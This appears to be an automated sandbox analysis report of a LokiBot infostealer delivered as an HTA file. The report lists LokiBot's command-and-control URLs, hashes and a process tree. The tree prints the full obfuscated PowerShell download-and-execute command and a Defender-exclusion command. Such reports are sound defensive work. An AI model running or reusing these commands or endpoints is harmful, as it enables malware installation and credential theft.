Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 07:26

General

  • Target

    9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta

  • Size

    23KB

  • MD5

    ec0d423a3f72d69975a1e31a275f5377

  • SHA1

    213922fb8456ecaadc24889afec1ac6ef5010c68

  • SHA256

    9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac

  • SHA512

    8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

  • SSDEEP

    96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
      "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1792
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xg6ussaw.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAB8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAB7.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2848
      • C:\Users\Admin\AppData\Roaming\wininit.exe
        "C:\Users\Admin\AppData\Roaming\wininit.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1640
        • C:\Users\Admin\AppData\Roaming\wininit.exe
          "C:\Users\Admin\AppData\Roaming\wininit.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESBAB8.tmp

    Filesize

    1KB

    MD5

    4d3cd0ff27b6273abc1b4e53c25da880

    SHA1

    f7446051b9bd475ebb9a03fc761647f1a44d15bf

    SHA256

    f3c6bf735802939bd5f6bfdedf137903bb17bd5c9257757a2266388a2a4fee17

    SHA512

    d65b5546965719f347fe9b3918fa627a78e98a75ccc082dd7fe5d4334c3c92cda25110d5cda1e0cbdfc693eedaa7241b47f2416c4983e62d6f44a3e2bd7af577

  • C:\Users\Admin\AppData\Local\Temp\xg6ussaw.dll

    Filesize

    3KB

    MD5

    a63a9231533f816cf4119b719d54ed9a

    SHA1

    54728a75c9782428c42961dff5be24ee6eb214ee

    SHA256

    39deb01682c30d2ebc62635e1e3ccfc3ef9597c7e5d7e27aafd1dfa6c226e9b4

    SHA512

    e90d05f116eb468d873ed422f2b804800edf98c55ad61441f69876632a6280a79d6f32b458b9f8b59afe134654c5debe8561b39108fcaf0ad4b545c1cc4919d1

  • C:\Users\Admin\AppData\Local\Temp\xg6ussaw.pdb

    Filesize

    7KB

    MD5

    6cbeb9ef7ac5b775fa164e8935f7cc5a

    SHA1

    615663e554433213cfce2a58a4f849a837f2efd7

    SHA256

    577e198389bfd60bdf277c9889201d32bc6cfccaa3c3d3c3452e8b120135d8d4

    SHA512

    c9b1c6bc8927ae7e44732c332e71b14b57556ce97f9e7248050e4df0de6be1ea4a3fb7874b12b649dc6f91e26cbdec3995befeb5d18041512fc2216e454cc3a0

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b60323869308c029c8130bb43a17b47b

    SHA1

    f9cc256d7a6ae26cf8fecf13099c71b0efb3f653

    SHA256

    372b6ae3b0d26019669776f8661e18677e2ab8c2b0ed709adb836a140381893f

    SHA512

    f37b316819f9bbde0cdf4d5c1127c25f28ed413e88a66b3f93ed7cde6bf807a91dad0dd63bbb336806de0df8de4c7b68e16f453f3605f6aa9014c45adbac5da0

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCBAB7.tmp

    Filesize

    652B

    MD5

    8a0f117efcba70b1f76207e659d59e00

    SHA1

    9dcab9ed61fb957fff46341a54a36a3d5a66f533

    SHA256

    0f1aebf4d7fd16d624d208fa44852da244f753684f815940aa702b140eff2dc8

    SHA512

    e6ab10473fc1284b70e7ca1b3cd81ffb86794b06809212ff8b9375e909f92fd52f658f808f9a6f9f072485b69e0b7966c9991a92a987e1551af934391e89fe20

  • \??\c:\Users\Admin\AppData\Local\Temp\xg6ussaw.0.cs

    Filesize

    480B

    MD5

    b0517586f4097114e790c61f2685f0d5

    SHA1

    20f7482298ab96731228ebd5242ceddfd72ff50f

    SHA256

    a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237

    SHA512

    c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

  • \??\c:\Users\Admin\AppData\Local\Temp\xg6ussaw.cmdline

    Filesize

    309B

    MD5

    edbbb43c0ddb7c5ea8512c072793d005

    SHA1

    6ffdb680d1087f137d77ec377b7a0facd7db1af3

    SHA256

    0e01a563d2425e8e6a168f642793904f386c8df2dec873e6df1900e6fe6f36cd

    SHA512

    dddc4a070ccac3b6dd1837e3ed773db3241872ea14deb2a17c01fabfaed4d7ced3e7bc6d89128b030acfa477c200a2f9b8846279a3733e9f4793058ffdf9f792

  • \Users\Admin\AppData\Roaming\wininit.exe

    Filesize

    586KB

    MD5

    66b03d1aff27d81e62b53fc108806211

    SHA1

    2557ec8b32d0b42cac9cabde199d31c5d4e40041

    SHA256

    59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4

    SHA512

    9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

  • memory/1632-49-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-46-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-51-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1632-44-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-42-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-40-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-38-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-77-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1632-85-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2592-37-0x00000000050E0000-0x0000000005144000-memory.dmp

    Filesize

    400KB

  • memory/2592-36-0x0000000000900000-0x0000000000912000-memory.dmp

    Filesize

    72KB

  • memory/2592-35-0x0000000000320000-0x00000000003B8000-memory.dmp

    Filesize

    608KB